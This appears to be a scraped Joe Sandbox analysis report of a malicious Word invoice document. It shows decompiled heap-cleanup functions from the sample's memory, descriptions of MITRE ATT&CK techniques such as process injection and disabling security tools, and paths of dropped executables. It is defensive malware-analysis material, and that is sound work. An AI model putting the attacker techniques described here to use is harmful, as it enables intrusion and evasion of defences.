Instruction Fuzzy Hash: E1414A75900705DFCB59DF68C494AAABBF5FF48300B1486AEE84AD7B12DB31E901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 000C47D9 Relevance: 5.1, APIs: 4, Instructions: 77
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E000C47D9(int* __ecx) {
				signed int _v8;
				long _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t18;
				long _t27;
				void* _t29;
				void* _t30;
				void* _t40;
				void* _t42;
				intOrPtr* _t43;
				long _t46;
				void* _t47;
				signed int _t48;

				_push(__ecx);
				_push(__ecx);
				_v8 =  *0xc8018 ^ _t48;
				_t29 = __ecx;
				_t33 =  &(__ecx[1]);
				E000C4A76( &(__ecx[1]), _t40,  &_v12);
				_t18 =  *__ecx - 1;
				 *__ecx = _t18;
				if(_t18 != 0) {
					_t46 = _v12;
					L12:
					if(_t46 != 0) {
						_push(_t46);
						_t18 = E000C29A8(_t33);
					}
					L14:
					_pop(_t42);
					_pop(_t47);
					_pop(_t30);
					return E000C6160(_t18, _t30, _v8 ^ _t48, _t40, _t42, _t47);
				}
				_t46 = 0;
				E000C45EB( &(__ecx[2]), 0);
				_t37 =  &(__ecx[3]);
				_t18 = E000C45EB( &(__ecx[3]), 0);
				if(_v12 != 0) {
					_t27 = GetLastError();
					_push(_v12);
					_t18 = E000C29A8(_t37);
					SetLastError(_t27);
				}
				if( *0xc8404 != 0) {
					goto L14;
				} else {
					_t43 =  *0xc8410;
					if(_t43 == 0) {
						_t18 = _t46;
					} else {
						 *0xc9294();
						_t18 =  *_t43() & 0x000000ff;
					}
					if(_t18 != 0) {
						goto L14;
					} else {
						E000C4A20(_t29 + 0x18);
						_t33 = _t29 + 8;
						E000C48D2(_t29 + 8);
						if( *((intOrPtr*)(_t29 + 4)) != _t46) {
							_push( *((intOrPtr*)(_t29 + 4)));
							E000C2981(_t29, _t33);
						}
						_t18 = HeapFree(GetProcessHeap(), _t46, _t29);
						goto L12;
					}
				}
			}

0x000c47de
0x000c47df
0x000c47e7
0x000c47ed
0x000c47f6
0x000c47f9
0x000c4800
0x000c4803
0x000c4805
0x000c4891
0x000c4894
0x000c4896
0x000c4898
0x000c4899
0x000c4899
0x000c489e
0x000c48a1
0x000c48a2
0x000c48a5
0x000c48ae
0x000c48ae
0x000c480b
0x000c4811
0x000c4817
0x000c481a
0x000c4822
0x000c4824
0x000c482a
0x000c482f
0x000c4835
0x000c4835
0x000c4842
0x00000000
0x000c4844
0x000c4844
0x000c484c
0x000c485d
0x000c484e
0x000c4850
0x000c4858
0x000c4858
0x000c4861
0x00000000
0x000c4863
0x000c4866
0x000c486b
0x000c486e
0x000c4876
0x000c4878
0x000c487b
0x000c487b
0x000c4889
0x00000000
0x000c4889
0x000c4861

APIs

Part of subcall function 000C4A76: WaitForSingleObjectEx.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,00000000,?,00000000,?,000C4701,?,?,?,00000000), ref: 000C4A85

Part of subcall function 000C45EB: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,?,?,000C45CC,00000000,?,?,?,?,000C2A3B,?,00000001,?), ref: 000C45FB
Part of subcall function 000C45EB: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,000C45CC,00000000,?,?,?,?,000C2A3B,?,00000001,?), ref: 000C460A

SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?), ref: 000C4835
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?), ref: 000C4824

Part of subcall function 000C29A8: ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 000C29B0

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 000C4882
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 000C4889

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: ErrorLast$Heap$FreeMutexObjectProcessReleaseSingleWait
String ID:
API String ID: 2060072361-0
Opcode ID: e71d9cd8ae93052261e54f160c61ff6622f65fa76485e87b07243fbaed863f87
Instruction ID: b2a1236d4e9e4a49275ace29d28a77bce3b3d12ce3f07e7ef31062d233e12af6
Opcode Fuzzy Hash: e71d9cd8ae93052261e54f160c61ff6622f65fa76485e87b07243fbaed863f87
Instruction Fuzzy Hash: 1621BE71900124EFDB14AF60DCA9EBEBB68FF51711B04815CF8069B156DF349D08D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 000C2D7A Relevance: 5.0, APIs: 4, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C2D7A(void* __ecx) {
				void* _t20;
				void* _t22;
				void* _t23;
				void** _t25;

				_t23 = __ecx;
				_t22 =  *(__ecx + 0x10);
				_t20 = _t22 + ( *(__ecx + 0x14) & 0x0000ffff) * 0x34;
				if(_t22 != _t20) {
					_t25 = _t22 + 0x2c;
					do {
						HeapFree(GetProcessHeap(), 0,  *_t25);
						 *_t25 =  *_t25 & 0x00000000;
						_t25 =  &(_t25[0xd]);
						 *(_t25 - 0x30) =  *(_t25 - 0x30) & 0x00000000;
					} while (_t25 - 0x2c != _t20);
					_t22 =  *(_t23 + 0x10);
				}
				HeapFree(GetProcessHeap(), 0, _t22);
				 *(_t23 + 0x10) =  *(_t23 + 0x10) & 0;
				 *((intOrPtr*)(_t23 + 0x14)) = 0;
				return 0;
			}

0x000c2d7e
0x000c2d84
0x000c2d8a
0x000c2d8e
0x000c2d91
0x000c2d94
0x000c2d9f
0x000c2da5
0x000c2da8
0x000c2dab
0x000c2db2
0x000c2db6
0x000c2db9
0x000c2dc4
0x000c2dcc
0x000c2dcf
0x000c2dd4

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,000C4A4B,?,?,00000000,?,?,?,?,000C47C2,?,?), ref: 000C2D98
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,000C47C2,?,?,?,?,00000000), ref: 000C2D9F
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,000C4A4B,?,?,00000000,?,?,?,?,000C47C2,?,?), ref: 000C2DBD
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,000C47C2,?,?,?,?,00000000), ref: 000C2DC4

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 6e42463d55dde98fac3bb8f98bc16388f2172115c0cffbe773e2039dcec91bd1
Instruction ID: a99ad107c4e5f37c19e1be83d3b1a674d3fee3da484e1fdd0f28e2a50a50129a
Opcode Fuzzy Hash: 6e42463d55dde98fac3bb8f98bc16388f2172115c0cffbe773e2039dcec91bd1
Instruction Fuzzy Hash: 94F03C72610211AFEB548FA0D888B69B7F8FB54712F21092DF542C6440DB74A855CBA0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report wpswireless-invoice-08.11.22.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\63CA26CB-402D-484B-8FDD-9A1DCA3EDC07

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1C02F562.png

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\907D81FB.png

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{BA43D80B-197B-47FB-952A-5A1171D0EFB1}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{BED8643F-71E8-40CE-8636-E16E70F1E391}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\rm[1].htm

C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe

C:\Users\user\AppData\Local\Temp\y133.tmp.dll

C:\Users\user\AppData\Local\Temp\~DFDCA04E6C9BCC80E5.TMP

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\wpswireless-invoice-08.11.22.doc.LNK

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

C:\Users\user\Desktop\~$swireless-invoice-08.11.22.doc

Static File Info

General

File Icon

Static OLE Info

General

OLE File "/opt/package/joesandbox/database/analysis/682568/sample/wpswireless-invoice-08.11.22.doc"

Indicators

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 2739

General

Windows Analysis Report
wpswireless-invoice-08.11.22.doc

Function 000C3F9E Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 193
memorylibrarynativeCOMMON

Function 000C5D14 Relevance: 10.6, APIs: 7, Instructions: 88
nativeCOMMON

Function 000C3A94 Relevance: 7.6, APIs: 5, Instructions: 85
librarywindowCOMMON

Function 000C5C96 Relevance: 4.6, APIs: 3, Instructions: 55
nativeCOMMON

Function 000C3F00 Relevance: 1.5, APIs: 1, Instructions: 28
nativeCOMMON

Function 000C6580 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 000C58CA Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 262
COMMON

Function 000C3938 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 107
processsynchronizationCOMMON

Function 000C371B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 117
fileCOMMON

Function 000C5F35 Relevance: 10.6, APIs: 7, Instructions: 132
sleepCOMMON

Function 000C387E Relevance: 9.1, APIs: 6, Instructions: 69
fileCOMMON

Function 000C3C8D Relevance: 6.1, APIs: 4, Instructions: 109
memoryCOMMON

Function 000C5F00 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON